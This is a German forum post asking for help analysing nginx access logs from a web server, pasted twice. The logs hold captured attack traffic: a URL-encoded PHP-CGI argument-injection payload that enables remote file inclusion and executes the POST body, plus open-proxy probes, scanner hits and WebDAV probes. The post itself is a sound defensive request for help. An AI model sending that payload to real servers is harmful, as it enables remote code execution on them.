serpent
0
Hallo ihr lieben,
zunächst mal möchte ich mich Entschuldigen das ich so lange nicht mehr hier war... die Arbeit .... - Sorry.
Ich habe hier einen NGINX Auszug meines Kollegen und hoffe das ihr mir bei der Auswertung helfen könnt.
Bitte verschiebt dieses Thema für den Fall das ich hier im falschem Forum bin.
Zunächst einmal die Logs:
Einen Eintrag aus dem 1. Log konnte ich (wenn ich richtig liege) auswerten der sieht das so aus:
=
Der Ursprung der IP-Adressen scheinen aus China zu stammen. Bei der Auswertung kommen ich leider bei folgenden Einträgen nicht weiter und bisher leider auch keine Idee für eine dekodierung :wall:
Auch im Access - Log /var/log/nginx/nginx_devi_access.log habe ich leider keine Idee wo ich dort ansetzen soll.
Auf dem Server läuft Debian 7, nginx 1.2.1 und PHP 5.6.24-1~dotdeb+7.1 (fpm-fcgi)
Vielen Dank für Eure Hilfe
zunächst mal möchte ich mich Entschuldigen das ich so lange nicht mehr hier war... die Arbeit .... - Sorry.
Ich habe hier einen NGINX Auszug meines Kollegen und hoffe das ihr mir bei der Auswertung helfen könnt.
Bitte verschiebt dieses Thema für den Fall das ich hier im falschem Forum bin.
Zunächst einmal die Logs:
"89.237.75.243 - - [18/Aug/2016:05:08:39 +0200] "GET / HTTP/1.0" 301 178 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
- [18/Aug/2016:05:40:06 +0200] "GET hxxp://180.163.113.82/check_proxy HTTP/1.1" 301 178 "-" "-"
- - [18/Aug/2016:05:44:10 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- - [18/Aug/2016:06:02:22 +0200] "OPTIONS /ipc$ HTTP/1.1" 301 178 "-" "Microsoft-WebDAV-MiniRedir/6.1.7601"
- - [18/Aug/2016:06:04:16 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36"
- - [18/Aug/2016:06:20:15 +0200] "GET /robots.txt HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
- - [18/Aug/2016:06:20:16 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
- - [18/Aug/2016:06:20:17 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
- - [18/Aug/2016:06:31:39 +0200] "GET / HTTP/1.1" 301 178 "hxxp://eupornstar.info/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
- - [18/Aug/2016:06:31:39 +0200] "GET / HTTP/1.1" 301 178 "hxxp://eupornstar.info/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
- - [18/Aug/2016:06:35:53 +0200] "GET / HTTP/1.1" 301 178 "hxxp://education-cz.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
- - [18/Aug/2016:06:35:54 +0200] "GET / HTTP/1.1" 301 178 "hxxp://education-cz.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
- - [18/Aug/2016:06:35:55 +0200] "GET / HTTP/1.1" 301 178 "hxxp://education-cz.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
- - [18/Aug/2016:07:06:13 +0200] "GET hxxp://testp1.piwo.pila.pl/testproxy.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
- - [18/Aug/2016:07:46:22 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +hxxp://www.baidu.com/search/spider.html)"
- - [18/Aug/2016:08:33:29 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- - [18/Aug/2016:10:13:19 +0200] "GET / HTTP/1.1" 301 178 "-" "=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16"
- - [18/Aug/2016:10:28:10 +0200] "GET /js/mage/cookies.js HTTP/1.1" 301 178 "best-bc.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4"
- - [18/Aug/2016:10:29:41 +0200] "HEAD /robots.txt HTTP/1.0" 301 0 "-" "-"
- - [18/Aug/2016:11:07:03 +0200] "OPTIONS /ipc$ HTTP/1.1" 301 178 "-" "Microsoft-WebDAV-MiniRedir/6.1.7601"
- - [18/Aug/2016:11:07:10 +0200] "OPTIONS /ipc$ HTTP/1.1" 301 178 "-" "Microsoft-WebDAV-MiniRedir/6.1.7601"
- - [18/Aug/2016:11:15:16 +0200] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69 %6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%6 4%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
- - [18/Aug/2016:11:32:39 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36"
- - [18/Aug/2016:11:46:04 +0200] "PROPFIND /webdav/ HTTP/1.1" 301 178 "-" "WEBDAV Client"
- - [18/Aug/2016:12:03:45 +0200] "\xFA\xD2\x1Ba\x05-\xE4\x9E\xA57\xC2\xF4x\x8AK\xCB\xA8`6\xEA\xD7\xFCl-|\xD6\x15\x86\xC7\xE2I@\xC8y\xF8\xB57\xEFe\xF2\x19\x8A\xA8\x17/\xC85\xB2\x91}\xC9Y\x8EB^\xA3\x9A\x07\xA9\x80N=\x95&" 400 166 "-" "-"
- [18/Aug/2016:12:26:32 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +hxxp://www.baidu.com/search/spider.html)"
- - [18/Aug/2016:12:41:00 +0200] "GET / HTTP/1.1" 301 178 "hxxp://tver.xrus.org/" "Mozilla/4.0 (compatible; MSIE 4.01; Digital AlphaServer 1000A 4/233; Windows NT; Powered By 64-Bit Alpha Processor)"
- - [18/Aug/2016:12:41:01 +0200] "GET / HTTP/1.1" 301 178 "hxxp://tver.xrus.org/" "Mozilla/4.0 (compatible; MSIE 4.01; Digital AlphaServer 1000A 4/233; Windows NT; Powered By 64-Bit Alpha Processor)"
- [18/Aug/2016:12:58:45 +0200] "\x04\x01\x00P\xB4\xA3qR\x00" 400 166 "-" "-"
- - [18/Aug/2016:13:01:39 +0200] "OPTIONS /ipc$ HTTP/1.1" 301 178 "-" "Microsoft-WebDAV-MiniRedir/6.1.7601"
- [18/Aug/2016:13:10:25 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
- - [18/Aug/2016:13:55:50 +0200] "GET /impressum.html HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://confib.ifmo.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
- - [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://interesnie-faktu.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
- - [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://confib.ifmo.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
- [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://interesnie-faktu.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
- - [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://confib.ifmo.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
- - [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://interesnie-faktu.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
- - [18/Aug/2016:15:34:15 +0200] "\x05\x02\x00\x02" 400 166 "-" "-"
- [18/Aug/2016:15:43:52 +0200] "GET /robots.txt HTTP/1.0" 301 178 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +hxxp://www.seokicks.de/robot.html)"
- - [18/Aug/2016:15:43:54 +0200] "GET / HTTP/1.0" 301 178 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +hxxp://www.seokicks.de/robot.html)"
- [18/Aug/2016:15:44:04 +0200] "GET / HTTP/1.1" 301 178 "hxxp://uptime.com/bestbc.de" "Mozilla/5.0 (compatible; Uptimebot/0.2.35; +hxxp://www.uptime.com/uptimebot)"
- - [18/Aug/2016:16:03:58 +0200] "GET / HTTP/1.1" 301 178 "hxxp://burger-imperia.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36"
- - [18/Aug/2016:16:07:51 +0200] "GET hxxp://testp4.pospr.waw.pl/testproxy.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
- - [18/Aug/2016:16:11:57 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
- - [18/Aug/2016:16:19:39 +0200] "GET /projekte/aktuell/sellnews HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- - [18/Aug/2016:16:19:39 +0200] "GET /projects.htm HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- - [18/Aug/2016:16:19:44 +0200] "GET /index.php?lang=de HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- - [18/Aug/2016:16:19:48 +0200] "GET /weihnachten HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- [18/Aug/2016:16:19:48 +0200] "GET /projekt-scouts.html HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- - [19/Aug/2016:05:31:19 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
- - [19/Aug/2016:05:32:09 +0200] "GET /robots.txt HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
- - [19/Aug/2016:05:32:11 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
- [19/Aug/2016:05:32:19 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
- - - [19/Aug/2016:05:32:19 +0200] "GET /favicon.ico HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
- - - [19/Aug/2016:05:32:21 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
- - - [19/Aug/2016:05:39:11 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- - - [19/Aug/2016:08:35:45 +0200] "GET / HTTP/1.0" 301 178 "-" "www.probethenet.com scanner"
- - - [19/Aug/2016:08:35:45 +0200] "HEAD /redirect.php HTTP/1.0" 301 0 "-" "www.probethenet.com scanner"
-- - [19/Aug/2016:10:00:44 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
- - - [19/Aug/2016:10:25:35 +0200] "GET hxxp://testp1.piwo.pila.pl/testproxy.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
- - [19/Aug/2016:10:31:29 +0200] "PROPFIND /webdav/ HTTP/1.1" 301 178 "-" "WEBDAV Client"
- - [19/Aug/2016:11:31:44 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
- - [19/Aug/2016:12:04:18 +0200] "GET /w00tw00t.at.ISC.SANS.DFind HTTP/1.1" 400 166 "-" "-"
- - [19/Aug/2016:12:05:48 +0200] "GET /w00tw00t.at.ISC.SANS.DFind HTTP/1.1" 400 166 "-" "-"]
- [18/Aug/2016:05:40:06 +0200] "GET hxxp://180.163.113.82/check_proxy HTTP/1.1" 301 178 "-" "-"
- - [18/Aug/2016:05:44:10 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- - [18/Aug/2016:06:02:22 +0200] "OPTIONS /ipc$ HTTP/1.1" 301 178 "-" "Microsoft-WebDAV-MiniRedir/6.1.7601"
- - [18/Aug/2016:06:04:16 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36"
- - [18/Aug/2016:06:20:15 +0200] "GET /robots.txt HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
- - [18/Aug/2016:06:20:16 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
- - [18/Aug/2016:06:20:17 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
- - [18/Aug/2016:06:31:39 +0200] "GET / HTTP/1.1" 301 178 "hxxp://eupornstar.info/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
- - [18/Aug/2016:06:31:39 +0200] "GET / HTTP/1.1" 301 178 "hxxp://eupornstar.info/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
- - [18/Aug/2016:06:35:53 +0200] "GET / HTTP/1.1" 301 178 "hxxp://education-cz.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
- - [18/Aug/2016:06:35:54 +0200] "GET / HTTP/1.1" 301 178 "hxxp://education-cz.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
- - [18/Aug/2016:06:35:55 +0200] "GET / HTTP/1.1" 301 178 "hxxp://education-cz.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
- - [18/Aug/2016:07:06:13 +0200] "GET hxxp://testp1.piwo.pila.pl/testproxy.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
- - [18/Aug/2016:07:46:22 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +hxxp://www.baidu.com/search/spider.html)"
- - [18/Aug/2016:08:33:29 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- - [18/Aug/2016:10:13:19 +0200] "GET / HTTP/1.1" 301 178 "-" "=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16"
- - [18/Aug/2016:10:28:10 +0200] "GET /js/mage/cookies.js HTTP/1.1" 301 178 "best-bc.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4"
- - [18/Aug/2016:10:29:41 +0200] "HEAD /robots.txt HTTP/1.0" 301 0 "-" "-"
- - [18/Aug/2016:11:07:03 +0200] "OPTIONS /ipc$ HTTP/1.1" 301 178 "-" "Microsoft-WebDAV-MiniRedir/6.1.7601"
- - [18/Aug/2016:11:07:10 +0200] "OPTIONS /ipc$ HTTP/1.1" 301 178 "-" "Microsoft-WebDAV-MiniRedir/6.1.7601"
- - [18/Aug/2016:11:15:16 +0200] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69 %6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%6 4%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
- - [18/Aug/2016:11:32:39 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36"
- - [18/Aug/2016:11:46:04 +0200] "PROPFIND /webdav/ HTTP/1.1" 301 178 "-" "WEBDAV Client"
- - [18/Aug/2016:12:03:45 +0200] "\xFA\xD2\x1Ba\x05-\xE4\x9E\xA57\xC2\xF4x\x8AK\xCB\xA8`6\xEA\xD7\xFCl-|\xD6\x15\x86\xC7\xE2I@\xC8y\xF8\xB57\xEFe\xF2\x19\x8A\xA8\x17/\xC85\xB2\x91}\xC9Y\x8EB^\xA3\x9A\x07\xA9\x80N=\x95&" 400 166 "-" "-"
- [18/Aug/2016:12:26:32 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +hxxp://www.baidu.com/search/spider.html)"
- - [18/Aug/2016:12:41:00 +0200] "GET / HTTP/1.1" 301 178 "hxxp://tver.xrus.org/" "Mozilla/4.0 (compatible; MSIE 4.01; Digital AlphaServer 1000A 4/233; Windows NT; Powered By 64-Bit Alpha Processor)"
- - [18/Aug/2016:12:41:01 +0200] "GET / HTTP/1.1" 301 178 "hxxp://tver.xrus.org/" "Mozilla/4.0 (compatible; MSIE 4.01; Digital AlphaServer 1000A 4/233; Windows NT; Powered By 64-Bit Alpha Processor)"
- [18/Aug/2016:12:58:45 +0200] "\x04\x01\x00P\xB4\xA3qR\x00" 400 166 "-" "-"
- - [18/Aug/2016:13:01:39 +0200] "OPTIONS /ipc$ HTTP/1.1" 301 178 "-" "Microsoft-WebDAV-MiniRedir/6.1.7601"
- [18/Aug/2016:13:10:25 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
- - [18/Aug/2016:13:55:50 +0200] "GET /impressum.html HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://confib.ifmo.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
- - [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://interesnie-faktu.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
- - [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://confib.ifmo.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
- [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://interesnie-faktu.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
- - [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://confib.ifmo.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
- - [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://interesnie-faktu.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
- - [18/Aug/2016:15:34:15 +0200] "\x05\x02\x00\x02" 400 166 "-" "-"
- [18/Aug/2016:15:43:52 +0200] "GET /robots.txt HTTP/1.0" 301 178 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +hxxp://www.seokicks.de/robot.html)"
- - [18/Aug/2016:15:43:54 +0200] "GET / HTTP/1.0" 301 178 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +hxxp://www.seokicks.de/robot.html)"
- [18/Aug/2016:15:44:04 +0200] "GET / HTTP/1.1" 301 178 "hxxp://uptime.com/bestbc.de" "Mozilla/5.0 (compatible; Uptimebot/0.2.35; +hxxp://www.uptime.com/uptimebot)"
- - [18/Aug/2016:16:03:58 +0200] "GET / HTTP/1.1" 301 178 "hxxp://burger-imperia.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36"
- - [18/Aug/2016:16:07:51 +0200] "GET hxxp://testp4.pospr.waw.pl/testproxy.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
- - [18/Aug/2016:16:11:57 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
- - [18/Aug/2016:16:19:39 +0200] "GET /projekte/aktuell/sellnews HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- - [18/Aug/2016:16:19:39 +0200] "GET /projects.htm HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- - [18/Aug/2016:16:19:44 +0200] "GET /index.php?lang=de HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- - [18/Aug/2016:16:19:48 +0200] "GET /weihnachten HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- [18/Aug/2016:16:19:48 +0200] "GET /projekt-scouts.html HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- - [19/Aug/2016:05:31:19 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
- - [19/Aug/2016:05:32:09 +0200] "GET /robots.txt HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
- - [19/Aug/2016:05:32:11 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
- [19/Aug/2016:05:32:19 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
- - - [19/Aug/2016:05:32:19 +0200] "GET /favicon.ico HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
- - - [19/Aug/2016:05:32:21 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
- - - [19/Aug/2016:05:39:11 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- - - [19/Aug/2016:08:35:45 +0200] "GET / HTTP/1.0" 301 178 "-" "www.probethenet.com scanner"
- - - [19/Aug/2016:08:35:45 +0200] "HEAD /redirect.php HTTP/1.0" 301 0 "-" "www.probethenet.com scanner"
-- - [19/Aug/2016:10:00:44 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
- - - [19/Aug/2016:10:25:35 +0200] "GET hxxp://testp1.piwo.pila.pl/testproxy.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
- - [19/Aug/2016:10:31:29 +0200] "PROPFIND /webdav/ HTTP/1.1" 301 178 "-" "WEBDAV Client"
- - [19/Aug/2016:11:31:44 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
- - [19/Aug/2016:12:04:18 +0200] "GET /w00tw00t.at.ISC.SANS.DFind HTTP/1.1" 400 166 "-" "-"
- - [19/Aug/2016:12:05:48 +0200] "GET /w00tw00t.at.ISC.SANS.DFind HTTP/1.1" 400 166 "-" "-"]
"-- - [18/Aug/2016:09:21:00 +0200] "GET / HTTP/1.1" 404 564 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36"
-- - [18/Aug/2016:09:21:01 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:02 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:02 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:02 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:03 +0200] "" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:03 +0200] "" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:04 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:04 +0200] "" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:04 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:05 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:08 +0200] "quit" 400 166 "-" "-"
-- - [18/Aug/2016:09:21:10 +0200] "" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:11 +0200] "-" 400 0 "-" "-"
